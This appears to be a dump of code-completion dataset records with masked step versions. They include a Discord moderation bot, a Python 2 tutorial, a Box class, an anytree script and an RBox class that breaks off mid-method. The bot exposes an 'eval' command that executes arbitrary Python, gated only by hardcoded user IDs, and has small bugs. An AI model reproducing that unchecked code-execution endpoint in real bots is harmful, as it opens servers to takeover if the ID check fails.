ctx.send(file=data_file)\n\n\n@bot.event\nasync def on_message(message: discord.Message):\n global previous_msg_sender_id\n if message.author.bot:\n return\n author: discord.Member = message.author\n channel: discord.TextChannel = message.channel\n guild: discord.Guild = message.guild\n await bot.process_commands(message)\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n if message.content.replace('!', '') == bot.user.mention:\n pre = data['prefix']\n await channel.send(f'The prefix in this server is `{pre}`')\n for afk_user_entry in data['afks']:\n afk_user_id = int(afk_user_entry['user'])\n afk_reason = afk_user_entry['reason']\n afk_user = guild.get_member(afk_user_id)\n if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:\n Data.server_data[str(guild.id)]['afks'].remove(afk_user_entry)\n await channel.send(f'**{afk_user}** is no longer AFK.')\n elif afk_user in message.mentions:\n await channel.send(\n f'**{afk_user}** is currently AFK because **{afk_reason}**.')\n if data['pay_respects'] and message.content.strip().lower() == 'f':\n await channel.send(\n f'**{author.display_name}** has paid their respects...')\n if data['active'] and str(author.id) not in data['users']:\n if not str(channel.id) in data['channels']:\n perms = author.permissions_in(channel)\n if not perms.administrator:\n if ('http://' in message.content or 'https://' in message.\n content):\n if len(data['urls']) > 0:\n for url in data['urls']:\n if not url in message.content:\n await channel.purge(limit=1)\n msg1 = await channel.send(\n f'{author.mention}, you are not allowed to send links in this channel.'\n )\n await asyncio.sleep(2)\n await msg1.delete()\n else:\n await channel.purge(limit=1)\n msg2 = await channel.send(\n f'{author.mention}, you are not allowed to send links in this channel.'\n )\n await asyncio.sleep(3)\n await msg2.delete()\n elif len(message.attachments) > 
0:\n await channel.purge(limit=1)\n msg3 = await channel.send(\n f'{author.mention}, you are not allowed to send attachments in this channel.'\n )\n await asyncio.sleep(3)\n await msg3.delete()\n previous_msg_sender_id = author.id\n\n\nbot.run(TOKEN)\n",
"step-5": "import os\nimport subprocess\nimport discord\nimport asyncio\nimport traceback\nimport sys\nimport ast\n\nfrom discord.ext import commands\n\n# Import Cogs\nfrom cogs.misc import Miscellaneous\nfrom cogs.serversettings import ServerSettings\nfrom cogs.mod import Moderator\nfrom cogs.automod import AutoMod\nfrom cogs.google import Google\n\n# Minigame/Fun Cogs\nfrom cogs.fun import Fun\n#from cogs.hangman import Hangman\n#from cogs.rps import RockPaperScissors\n\nfrom otherscipts.helpers import update_presence\nfrom otherscipts.data import Data\n\nTOKEN = os.getenv('SPARTA_TOKEN')\n\nintents = discord.Intents.default()\nintents.members = True\n\n\ndef get_prefix(client, message):\n if str(message.guild.id) not in Data.server_data:\n Data.server_data[str(message.guild.id)] = Data.create_new_data()\n\n data = Data.server_data[str(message.guild.id)]\n return data[\"prefix\"]\n\n\nPREFIX = get_prefix\nbot = commands.Bot(\n command_prefix=PREFIX,\n description=\"I am Sparta Bot, a bot for the Official Sparta Gaming Discord server.\",\n intents=intents,\n help_command=None,\n case_insensitive=True\n)\n\nTHEME_COLOR = discord.Colour.blue()\n\n# Add Cogs\nbot.add_cog(Miscellaneous(bot, THEME_COLOR))\nbot.add_cog(ServerSettings(bot, THEME_COLOR))\nbot.add_cog(Moderator(bot, THEME_COLOR))\nbot.add_cog(AutoMod(bot, THEME_COLOR))\nbot.add_cog(Fun(bot, THEME_COLOR))\nbot.add_cog(Google(bot, THEME_COLOR))\n#bot.add_cog(Hangman(bot, THEME_COLOR))\n#bot.add_cog(RockPaperScissors(bot, THEME_COLOR))\n\nprevious_msg_sender_id = None\n\n\n@bot.event\nasync def on_ready():\n bot.loop.create_task(Data.auto_update_data())\n bot.loop.create_task(update_presence(bot, PREFIX))\n print(\"Bot is ready...\")\n\n@bot.event\nasync def on_guild_join(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(f\"Joined - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}\")\n@bot.event\nasync def on_guild_remove(guild):\n log_channel = 
bot.get_channel(773580297954394162)\n await log_channel.send(f\"Left - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}\")\n\n@bot.event\nasync def on_member_join(member):\n guild: discord.Guild = member.guild\n channels = guild.channels\n\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n\n print(f\"{member} has joined {guild} server...\")\n\n join_role = guild.get_role(data[\"join_role\"])\n if join_role is not None:\n await member.add_roles(join_role)\n\n # Welcome Message\n if data[\"welcome_msg\"] is None:\n server_wlcm_msg = f\"Welcome, {member.mention}, to the Official **{guild.name}** Server\"\n else:\n server_wlcm_msg = data[\"welcome_msg\"]\n server_wlcm_msg = server_wlcm_msg.replace(\n \"[mention]\", f\"{member.mention}\")\n\n # Welcome Channel\n wel_channel = None\n\n if data[\"welcome_channel\"] is None:\n for channel in channels:\n if str(channel).find(\"welcome\") != -1:\n wel_channel = channel\n break\n else:\n wel_channel = guild.get_channel(int(data[\"welcome_channel\"]))\n\n try:\n await wel_channel.send(server_wlcm_msg)\n except AttributeError:\n print(\"DEBUG: No welcome channel has been set or found.\")\n\n#Remove welcome channel\n@bot.command(name=\"remove_welcome\", aliases=['rwel', 'remwel'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n \n Data.server_data[str(ctx.guild.id)][\"welcome_channel\"] = channel\n await ctx.send(\"This server's welcome channel has been removed\")\n\n@bot.event\nasync def on_member_remove(member):\n guild = member.guild\n channels = guild.channels\n\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n\n print(f\"{member} has left the {guild.name}...\")\n\n 
# Leave Message\n if data[\"leave_msg\"] is None:\n server_leave_msg = f\"Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server\"\n else:\n server_leave_msg = data[\"leave_msg\"]\n server_leave_msg = server_leave_msg.replace(\"[member]\", f\"{member}\")\n\n # Leave Channel\n lv_channel = None\n\n if data[\"leave_channel\"] is None:\n for channel in channels:\n if str(channel).find(\"bye\") != -1 or str(channel).find(\"leave\") != -1:\n lv_channel = channel\n break\n else:\n lv_channel = guild.get_channel(int(data[\"leave_channel\"]))\n\n try:\n await lv_channel.send(server_leave_msg)\n except AttributeError:\n print(\"DEBUG: No leave channel has been set or found.\")\n\n\n#Remove leave\n@bot.command(name=\"remove_leave\", aliases=['rleave', 'remleave'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome( ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n \n Data.server_data[str(ctx.guild.id)][\"leave_channel\"] = channel\n await ctx.send(\"This server's leave channel has been Removed\")\n\n@bot.event\nasync def on_command_error(ctx, error):\n try:\n error = error.original\n except Exception:\n pass\n if type(error) is discord.ext.commands.errors.CommandNotFound:\n return\n elif type(error) is discord.ext.commands.errors.BadArgument:\n pass\n elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:\n pass\n elif type(error) is discord.ext.commands.errors.NoPrivateMessage:\n pass\n elif type(error) is discord.ext.commands.errors.MissingPermissions:\n pass\n elif type(error) is discord.ext.commands.errors.NotOwner:\n pass\n elif type(error) is discord.ext.commands.errors.CommandOnCooldown:\n pass\n elif type(error) is discord.ext.commands.errors.ChannelNotFound:\n pass\n elif type(error) is discord.ext.commands.errors.BadUnionArgument:\n pass\n elif type(error) is discord.ext.commands.errors.BotMissingPermissions:\n pass\n 
elif type(error) is discord.errors.Forbidden:\n error = \"I don't have permission to do that!\"\n else:\n print(f\"Error {type(error)}: {error}\")\n traceback.print_exception(\n type(error), error, error.__traceback__, file=sys.stderr\n )\n\n embed = discord.Embed(\n title='Error!',\n description='An unexpected error ocurred.\\\n Please report this to the dev.',\n )\n embed.add_field(\n name='Error Message:',\n value=f\"{type(error)}:\\n{error}\",\n inline=False\n )\n await ctx.send(f\"{error}\")\n\n\n# LABEL: Programming Commands\ndef insert_returns(body):\n # insert return stmt if the last expression is a expression statement\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n\n # for if statements, we insert returns into the body and the orelse\n if isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n\n # for with blocks, again we insert returns into the body\n if isinstance(body[-1], ast.With):\n insert_returns(body[-1].body)\n\n\n@bot.command(name='eval')\nasync def eval_fn(ctx, *, cmd):\n \"\"\"Evaluates input.\n Input is interpreted as newline seperated statements.\n If the last statement is an expression, that is the return value.\n Usable globals:\n - `bot`: the bot instance\n - `discord`: the discord module\n - `commands`: the discord.ext.commands module\n - `ctx`: the invokation context\n - `__import__`: the builtin `__import__` function\n Such that `>eval 1 + 1` gives `2` as the result.\n The following invokation will cause the bot to send the text '9'\n to the channel of invokation and return '3' as the result of evaluating\n >eval ```\n a = 1 + 2\n b = a * 2\n await ctx.send(a + b)\n a\n ```\n \"\"\"\n if ctx.message.author.id not in [400857098121904149, 733532987794128897]:\n await ctx.send(\"You are not authorized to run this command\")\n return\n\n fn_name = \"_eval_expr\"\n\n cmd = cmd.strip(\"` \")\n\n # add a layer of indentation\n cmd = 
\"\\n\".join(f\" {i}\" for i in cmd.splitlines())\n\n # wrap in async def body\n body = f\"async def {fn_name}():\\n{cmd}\"\n\n parsed = ast.parse(body)\n body = parsed.body[0].body\n\n insert_returns(body)\n\n env = {\n 'bot': ctx.bot,\n 'discord': discord,\n 'commands': commands,\n 'ctx': ctx,\n '__import__': __import__\n }\n exec(compile(parsed, filename=\"<ast>\", mode=\"exec\"), env)\n\n result = (await eval(f\"{fn_name}()\", env))\n await ctx.send(result)\n\n\n# LABEL: Debugging Commands\n@bot.command(name=\"data\")\nasync def data(ctx):\n is_owner = await bot.is_owner(ctx.author)\n if is_owner or ctx.author.id == 733532987794128897: # for real sparta\n data_file = discord.File(\"data.json\")\n await ctx.send(file=data_file)\n\n\n@bot.event\nasync def on_message(message: discord.Message):\n global previous_msg_sender_id\n\n if message.author.bot:\n return\n\n author: discord.Member = message.author\n channel: discord.TextChannel = message.channel\n guild: discord.Guild = message.guild\n # print(str(author), \": \", message.content)\n\n await bot.process_commands(message)\n\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n\n data = Data.server_data[str(guild.id)]\n\n if message.content.replace('!', '') == bot.user.mention:\n pre = data[\"prefix\"]\n await channel.send(f\"The prefix in this server is `{pre}`\")\n\n for afk_user_entry in data[\"afks\"]:\n afk_user_id = int(afk_user_entry[\"user\"])\n afk_reason = afk_user_entry[\"reason\"]\n afk_user = guild.get_member(afk_user_id)\n\n if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:\n Data.server_data[str(guild.id)][\"afks\"].remove(afk_user_entry)\n await channel.send(f\"**{afk_user}** is no longer AFK.\")\n\n elif afk_user in message.mentions:\n await channel.send(f\"**{afk_user}** is currently AFK because **{afk_reason}**.\")\n\n if data[\"pay_respects\"] and message.content.strip().lower() == \"f\":\n await 
channel.send(f\"**{author.display_name}** has paid their respects...\")\n\n if data[\"active\"] and str(author.id) not in data[\"users\"]:\n if not str(channel.id) in data[\"channels\"]:\n perms = author.permissions_in(channel)\n if not perms.administrator:\n if \"http://\" in message.content or \"https://\" in message.content:\n if len(data[\"urls\"]) > 0:\n for url in data[\"urls\"]:\n if not url in message.content:\n await channel.purge(limit=1)\n msg1 = await channel.send(f\"{author.mention}, you are not allowed to send links in this channel.\")\n await asyncio.sleep(2)\n await msg1.delete()\n else:\n await channel.purge(limit=1)\n msg2 = await channel.send(f\"{author.mention}, you are not allowed to send links in this channel.\")\n await asyncio.sleep(3)\n await msg2.delete()\n\n elif len(message.attachments) > 0:\n await channel.purge(limit=1)\n msg3 = await channel.send(f\"{author.mention}, you are not allowed to send attachments in this channel.\")\n await asyncio.sleep(3)\n await msg3.delete()\n\n previous_msg_sender_id = author.id\n\n\nbot.run(TOKEN)\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
#! /usr/bin/python
import glo
print glo.x
a = "hello world"
print id(a)
a = "ni hao"
print id(a)
for y in range(0, 5, 2):
print y
for y in 1, 2, 3:
print y
if (glo.x == 2):
print("a==2")
else:
print("a!=2")
tuple_name = ("name", "age", "school") #can't modify, only-read
list_name = ["boy", "girl"] #can modify
dict_name = {"a":"hello", "b":"world"}
def fun_hello(a=0, b=1):
print("hello everybody")
print(a)
print(b)
fun_hello()
class MyClass:
common=5
def fun_sum(self, m, n):
print(m+n)
mySum = MyClass()
mySum.fun_sum(11, 22)
mySum001 = MyClass()
print(mySum.common)
print(mySum001.common)
MyClass.common = 1000
print(mySum.common)
print(mySum001.common)
mySum.common = 9999
print(mySum.common)
print(mySum001.common)
class Student(MyClass):
def fun_age(self, d):
print(d)
stu = Student()
stu.fun_age(100)
stu.fun_sum(100, 200)
f = file("sayHello.txt", "w")
f.write("hello girls")
f.close()
section = "hello boys"
print(section[2:6]) #llo
|
normal
|
{
"blob_id": "17326597d0597d16717c87c9bdf8733fb3acb77b",
"index": 7943,
"step-1": "#! /usr/bin/python\n\nimport glo\nprint glo.x\n\na = \"hello world\"\nprint id(a)\n\na = \"ni hao\"\nprint id(a)\n\nfor y in range(0, 5, 2):\n print y\n\nfor y in 1, 2, 3:\n print y\n\nif (glo.x == 2):\n print(\"a==2\")\nelse:\n print(\"a!=2\")\n\ntuple_name = (\"name\", \"age\", \"school\") #can't modify, only-read\nlist_name = [\"boy\", \"girl\"] #can modify\ndict_name = {\"a\":\"hello\", \"b\":\"world\"}\n\ndef fun_hello(a=0, b=1):\n print(\"hello everybody\")\n print(a)\n print(b)\nfun_hello()\n\nclass MyClass:\n common=5\n def fun_sum(self, m, n):\n print(m+n)\nmySum = MyClass()\nmySum.fun_sum(11, 22)\n\nmySum001 = MyClass()\nprint(mySum.common)\nprint(mySum001.common)\nMyClass.common = 1000\nprint(mySum.common)\nprint(mySum001.common)\nmySum.common = 9999\nprint(mySum.common)\nprint(mySum001.common)\n\nclass Student(MyClass):\n def fun_age(self, d):\n print(d)\nstu = Student()\nstu.fun_age(100)\nstu.fun_sum(100, 200)\n\n\nf = file(\"sayHello.txt\", \"w\")\nf.write(\"hello girls\")\nf.close()\n\nsection = \"hello boys\"\nprint(section[2:6]) #llo\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
"""Stencil based grid operations in 2D."""
from .advection_flux_2d import gen_advection_flux_conservative_eno3_pyst_kernel_2d
from .advection_timestep_2d import (
gen_advection_timestep_euler_forward_conservative_eno3_pyst_kernel_2d,
)
from .brinkmann_penalise_2d import (
gen_brinkmann_penalise_pyst_kernel_2d,
gen_brinkmann_penalise_vs_fixed_val_pyst_kernel_2d,
)
from .char_func_from_level_set_2d import (
gen_char_func_from_level_set_via_sine_heaviside_pyst_kernel_2d,
)
from .diffusion_flux_2d import gen_diffusion_flux_pyst_kernel_2d
from .diffusion_timestep_2d import gen_diffusion_timestep_euler_forward_pyst_kernel_2d
from .elementwise_ops_2d import (
gen_add_fixed_val_pyst_kernel_2d,
gen_elementwise_complex_product_pyst_kernel_2d,
gen_elementwise_copy_pyst_kernel_2d,
gen_elementwise_sum_pyst_kernel_2d,
gen_set_fixed_val_at_boundaries_pyst_kernel_2d,
gen_set_fixed_val_pyst_kernel_2d,
gen_elementwise_saxpby_pyst_kernel_2d,
)
from .inplane_field_curl_2d import gen_inplane_field_curl_pyst_kernel_2d
from .outplane_field_curl_2d import gen_outplane_field_curl_pyst_kernel_2d
from .penalise_field_boundary_2d import gen_penalise_field_boundary_pyst_kernel_2d
from .update_vorticity_from_velocity_forcing_2d import (
gen_update_vorticity_from_penalised_velocity_pyst_kernel_2d,
gen_update_vorticity_from_velocity_forcing_pyst_kernel_2d,
)
|
normal
|
{
"blob_id": "2dddee735e23e8cdb7df83f47f63926727cf8963",
"index": 2731,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfrom .advection_flux_2d import gen_advection_flux_conservative_eno3_pyst_kernel_2d\nfrom .advection_timestep_2d import gen_advection_timestep_euler_forward_conservative_eno3_pyst_kernel_2d\nfrom .brinkmann_penalise_2d import gen_brinkmann_penalise_pyst_kernel_2d, gen_brinkmann_penalise_vs_fixed_val_pyst_kernel_2d\nfrom .char_func_from_level_set_2d import gen_char_func_from_level_set_via_sine_heaviside_pyst_kernel_2d\nfrom .diffusion_flux_2d import gen_diffusion_flux_pyst_kernel_2d\nfrom .diffusion_timestep_2d import gen_diffusion_timestep_euler_forward_pyst_kernel_2d\nfrom .elementwise_ops_2d import gen_add_fixed_val_pyst_kernel_2d, gen_elementwise_complex_product_pyst_kernel_2d, gen_elementwise_copy_pyst_kernel_2d, gen_elementwise_sum_pyst_kernel_2d, gen_set_fixed_val_at_boundaries_pyst_kernel_2d, gen_set_fixed_val_pyst_kernel_2d, gen_elementwise_saxpby_pyst_kernel_2d\nfrom .inplane_field_curl_2d import gen_inplane_field_curl_pyst_kernel_2d\nfrom .outplane_field_curl_2d import gen_outplane_field_curl_pyst_kernel_2d\nfrom .penalise_field_boundary_2d import gen_penalise_field_boundary_pyst_kernel_2d\nfrom .update_vorticity_from_velocity_forcing_2d import gen_update_vorticity_from_penalised_velocity_pyst_kernel_2d, gen_update_vorticity_from_velocity_forcing_pyst_kernel_2d\n",
"step-3": "\"\"\"Stencil based grid operations in 2D.\"\"\"\nfrom .advection_flux_2d import gen_advection_flux_conservative_eno3_pyst_kernel_2d\nfrom .advection_timestep_2d import (\n gen_advection_timestep_euler_forward_conservative_eno3_pyst_kernel_2d,\n)\nfrom .brinkmann_penalise_2d import (\n gen_brinkmann_penalise_pyst_kernel_2d,\n gen_brinkmann_penalise_vs_fixed_val_pyst_kernel_2d,\n)\nfrom .char_func_from_level_set_2d import (\n gen_char_func_from_level_set_via_sine_heaviside_pyst_kernel_2d,\n)\nfrom .diffusion_flux_2d import gen_diffusion_flux_pyst_kernel_2d\nfrom .diffusion_timestep_2d import gen_diffusion_timestep_euler_forward_pyst_kernel_2d\nfrom .elementwise_ops_2d import (\n gen_add_fixed_val_pyst_kernel_2d,\n gen_elementwise_complex_product_pyst_kernel_2d,\n gen_elementwise_copy_pyst_kernel_2d,\n gen_elementwise_sum_pyst_kernel_2d,\n gen_set_fixed_val_at_boundaries_pyst_kernel_2d,\n gen_set_fixed_val_pyst_kernel_2d,\n gen_elementwise_saxpby_pyst_kernel_2d,\n)\nfrom .inplane_field_curl_2d import gen_inplane_field_curl_pyst_kernel_2d\nfrom .outplane_field_curl_2d import gen_outplane_field_curl_pyst_kernel_2d\nfrom .penalise_field_boundary_2d import gen_penalise_field_boundary_pyst_kernel_2d\nfrom .update_vorticity_from_velocity_forcing_2d import (\n gen_update_vorticity_from_penalised_velocity_pyst_kernel_2d,\n gen_update_vorticity_from_velocity_forcing_pyst_kernel_2d,\n)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
class Box:
def __init__(self, id, capacity):
self.id = id
self.dogs = []
self.capacity = capacity
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Box:
def __init__(self, id, capacity):
self.id = id
self.dogs = []
self.capacity = capacity
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def remove_dog(self, dog):
if self.status > 0:
self.dogs.remove(dog)
return True
else:
return False
<|reserved_special_token_1|>
class Box:
def __init__(self, id, capacity):
self.id = id
self.dogs = []
self.capacity = capacity
@property
def status(self):
return len(self.dogs)
<|reserved_special_token_0|>
def remove_dog(self, dog):
if self.status > 0:
self.dogs.remove(dog)
return True
else:
return False
<|reserved_special_token_1|>
class Box:
def __init__(self, id, capacity):
self.id = id
self.dogs = []
self.capacity = capacity
@property
def status(self):
return len(self.dogs)
def add_dog(self, dog):
if self.capacity > self.status:
self.dogs.append(dog)
return True
else:
return False
def remove_dog(self, dog):
if self.status > 0:
self.dogs.remove(dog)
return True
else:
return False
|
flexible
|
{
"blob_id": "5f24c5a21dc151e9efbbfaff0fe1e71e65d1eb67",
"index": 1590,
"step-1": "class Box:\n\n def __init__(self, id, capacity):\n self.id = id\n self.dogs = []\n self.capacity = capacity\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "class Box:\n\n def __init__(self, id, capacity):\n self.id = id\n self.dogs = []\n self.capacity = capacity\n <mask token>\n <mask token>\n\n def remove_dog(self, dog):\n if self.status > 0:\n self.dogs.remove(dog)\n return True\n else:\n return False\n",
"step-3": "class Box:\n\n def __init__(self, id, capacity):\n self.id = id\n self.dogs = []\n self.capacity = capacity\n\n @property\n def status(self):\n return len(self.dogs)\n <mask token>\n\n def remove_dog(self, dog):\n if self.status > 0:\n self.dogs.remove(dog)\n return True\n else:\n return False\n",
"step-4": "class Box:\n\n def __init__(self, id, capacity):\n self.id = id\n self.dogs = []\n self.capacity = capacity\n\n @property\n def status(self):\n return len(self.dogs)\n\n def add_dog(self, dog):\n if self.capacity > self.status:\n self.dogs.append(dog)\n return True\n else:\n return False\n\n def remove_dog(self, dog):\n if self.status > 0:\n self.dogs.remove(dog)\n return True\n else:\n return False\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
DotExporter(webtest).to_picture('webtest.png')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
webtest = Node('WebappTest')
registration = Node('Registration', parent=webtest)
smsconfirm = Node('SMSconfirm', parent=registration)
login = Node('Login', parent=smsconfirm)
useruploadCV = Node('UserUploadCV', parent=login)
usermatchJD = Node('UserMatchJD', parent=useruploadCV)
bemember = Node('BeMember', parent=login)
addprj = Node('AddProject', parent=bemember)
memuploadCV = Node('MemberUploadCV', parent=addprj)
memupfollowupCV = Node('MemberFollowupCV', parent=memuploadCV)
previewCV = Node('PreviewCV', parent=memuploadCV)
addbid = Node('AddBidding', parent=addprj)
modbid = Node('ModifyBidding', parent=addbid)
addcus = Node('AddCustomer', parent=addbid)
addJD = Node('AddJD', parent=addcus)
JDmatchCV = Node('JDmatchCV', parent=addJD)
JDmatchCVMultiDB = Node('JDmatchCVMultiDB', parent=JDmatchCV)
previewMatchCV = Node('previewMatchCV', parent=JDmatchCVMultiDB)
CVraderChart = Node('CVraderChart', parent=JDmatchCVMultiDB)
<|reserved_special_token_0|>
DotExporter(webtest).to_picture('webtest.png')
<|reserved_special_token_1|>
from anytree import Node, RenderTree
webtest = Node('WebappTest')
registration = Node('Registration', parent=webtest)
smsconfirm = Node('SMSconfirm', parent=registration)
login = Node('Login', parent=smsconfirm)
useruploadCV = Node('UserUploadCV', parent=login)
usermatchJD = Node('UserMatchJD', parent=useruploadCV)
bemember = Node('BeMember', parent=login)
addprj = Node('AddProject', parent=bemember)
memuploadCV = Node('MemberUploadCV', parent=addprj)
memupfollowupCV = Node('MemberFollowupCV', parent=memuploadCV)
previewCV = Node('PreviewCV', parent=memuploadCV)
addbid = Node('AddBidding', parent=addprj)
modbid = Node('ModifyBidding', parent=addbid)
addcus = Node('AddCustomer', parent=addbid)
addJD = Node('AddJD', parent=addcus)
JDmatchCV = Node('JDmatchCV', parent=addJD)
JDmatchCVMultiDB = Node('JDmatchCVMultiDB', parent=JDmatchCV)
previewMatchCV = Node('previewMatchCV', parent=JDmatchCVMultiDB)
CVraderChart = Node('CVraderChart', parent=JDmatchCVMultiDB)
from anytree.exporter import DotExporter
DotExporter(webtest).to_picture('webtest.png')
<|reserved_special_token_1|>
#!/usr/bin/env python
from anytree import Node, RenderTree
webtest = Node("WebappTest")
registration = Node("Registration", parent=webtest)
smsconfirm = Node("SMSconfirm", parent=registration)
login = Node("Login", parent=smsconfirm)
useruploadCV = Node("UserUploadCV", parent=login)
usermatchJD = Node("UserMatchJD", parent=useruploadCV)
bemember = Node("BeMember", parent=login)
addprj = Node("AddProject", parent=bemember)
memuploadCV = Node("MemberUploadCV", parent=addprj)
memupfollowupCV = Node("MemberFollowupCV", parent=memuploadCV)
previewCV = Node("PreviewCV", parent=memuploadCV)
addbid = Node("AddBidding", parent=addprj)
modbid = Node("ModifyBidding", parent=addbid)
addcus = Node("AddCustomer", parent=addbid)
addJD = Node("AddJD", parent=addcus)
JDmatchCV = Node("JDmatchCV", parent=addJD)
JDmatchCVMultiDB = Node("JDmatchCVMultiDB", parent=JDmatchCV)
previewMatchCV = Node("previewMatchCV", parent=JDmatchCVMultiDB)
CVraderChart = Node("CVraderChart", parent=JDmatchCVMultiDB)
from anytree.exporter import DotExporter
DotExporter(webtest).to_picture("webtest.png")
|
flexible
|
{
"blob_id": "33ac328b2bf16380b50c58013bd0d4d888dc3952",
"index": 4693,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nDotExporter(webtest).to_picture('webtest.png')\n",
"step-3": "<mask token>\nwebtest = Node('WebappTest')\nregistration = Node('Registration', parent=webtest)\nsmsconfirm = Node('SMSconfirm', parent=registration)\nlogin = Node('Login', parent=smsconfirm)\nuseruploadCV = Node('UserUploadCV', parent=login)\nusermatchJD = Node('UserMatchJD', parent=useruploadCV)\nbemember = Node('BeMember', parent=login)\naddprj = Node('AddProject', parent=bemember)\nmemuploadCV = Node('MemberUploadCV', parent=addprj)\nmemupfollowupCV = Node('MemberFollowupCV', parent=memuploadCV)\npreviewCV = Node('PreviewCV', parent=memuploadCV)\naddbid = Node('AddBidding', parent=addprj)\nmodbid = Node('ModifyBidding', parent=addbid)\naddcus = Node('AddCustomer', parent=addbid)\naddJD = Node('AddJD', parent=addcus)\nJDmatchCV = Node('JDmatchCV', parent=addJD)\nJDmatchCVMultiDB = Node('JDmatchCVMultiDB', parent=JDmatchCV)\npreviewMatchCV = Node('previewMatchCV', parent=JDmatchCVMultiDB)\nCVraderChart = Node('CVraderChart', parent=JDmatchCVMultiDB)\n<mask token>\nDotExporter(webtest).to_picture('webtest.png')\n",
"step-4": "from anytree import Node, RenderTree\nwebtest = Node('WebappTest')\nregistration = Node('Registration', parent=webtest)\nsmsconfirm = Node('SMSconfirm', parent=registration)\nlogin = Node('Login', parent=smsconfirm)\nuseruploadCV = Node('UserUploadCV', parent=login)\nusermatchJD = Node('UserMatchJD', parent=useruploadCV)\nbemember = Node('BeMember', parent=login)\naddprj = Node('AddProject', parent=bemember)\nmemuploadCV = Node('MemberUploadCV', parent=addprj)\nmemupfollowupCV = Node('MemberFollowupCV', parent=memuploadCV)\npreviewCV = Node('PreviewCV', parent=memuploadCV)\naddbid = Node('AddBidding', parent=addprj)\nmodbid = Node('ModifyBidding', parent=addbid)\naddcus = Node('AddCustomer', parent=addbid)\naddJD = Node('AddJD', parent=addcus)\nJDmatchCV = Node('JDmatchCV', parent=addJD)\nJDmatchCVMultiDB = Node('JDmatchCVMultiDB', parent=JDmatchCV)\npreviewMatchCV = Node('previewMatchCV', parent=JDmatchCVMultiDB)\nCVraderChart = Node('CVraderChart', parent=JDmatchCVMultiDB)\nfrom anytree.exporter import DotExporter\nDotExporter(webtest).to_picture('webtest.png')\n",
"step-5": "#!/usr/bin/env python\n\nfrom anytree import Node, RenderTree\n\n\nwebtest = Node(\"WebappTest\")\nregistration = Node(\"Registration\", parent=webtest)\nsmsconfirm = Node(\"SMSconfirm\", parent=registration)\nlogin = Node(\"Login\", parent=smsconfirm)\nuseruploadCV = Node(\"UserUploadCV\", parent=login)\nusermatchJD = Node(\"UserMatchJD\", parent=useruploadCV)\nbemember = Node(\"BeMember\", parent=login)\naddprj = Node(\"AddProject\", parent=bemember)\nmemuploadCV = Node(\"MemberUploadCV\", parent=addprj)\nmemupfollowupCV = Node(\"MemberFollowupCV\", parent=memuploadCV)\npreviewCV = Node(\"PreviewCV\", parent=memuploadCV)\naddbid = Node(\"AddBidding\", parent=addprj)\nmodbid = Node(\"ModifyBidding\", parent=addbid)\naddcus = Node(\"AddCustomer\", parent=addbid)\naddJD = Node(\"AddJD\", parent=addcus)\nJDmatchCV = Node(\"JDmatchCV\", parent=addJD)\nJDmatchCVMultiDB = Node(\"JDmatchCVMultiDB\", parent=JDmatchCV)\npreviewMatchCV = Node(\"previewMatchCV\", parent=JDmatchCVMultiDB)\nCVraderChart = Node(\"CVraderChart\", parent=JDmatchCVMultiDB)\n\n\nfrom anytree.exporter import DotExporter\nDotExporter(webtest).to_picture(\"webtest.png\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class RBox:
def __init__(self):
self.x = 0
self.y = 0
self.w = 0
self.h = 0
@staticmethod
def fromClassicalBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[1]
rbox.w = box[2]
rbox.h = box[3]
return rbox
@staticmethod
def fromClassicalBoundingBoxes(boxes):
return [RBox.fromClassicalBoundingBox(box) for box in boxes]
@staticmethod
def fromRoughBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[2]
rbox.h = box[1] - box[0]
rbox.w = box[3] - box[2]
return rbox
@staticmethod
def fromPointBoundingBox(box):
rbox = RBox()
rbox.x = box[0][0]
rbox.y = box[0][1]
rbox.w = box[1][0] - box[0][0]
rbox.h = box[1][1] - box[0][1]
return rbox
@staticmethod
def fromPointBoundingBoxes(boxes):
return [RBox.fromPointBoundingBox(box) for box in boxes]
def classicalBoundingBox(self):
return [self.x, self.y, self.w, self.h]
def pointBoundingBox(self):
return (self.x, self.y), (self.x + self.w, self.y + self.h)
def area(self):
return self.h * self.w
def __or__(self, other_box):
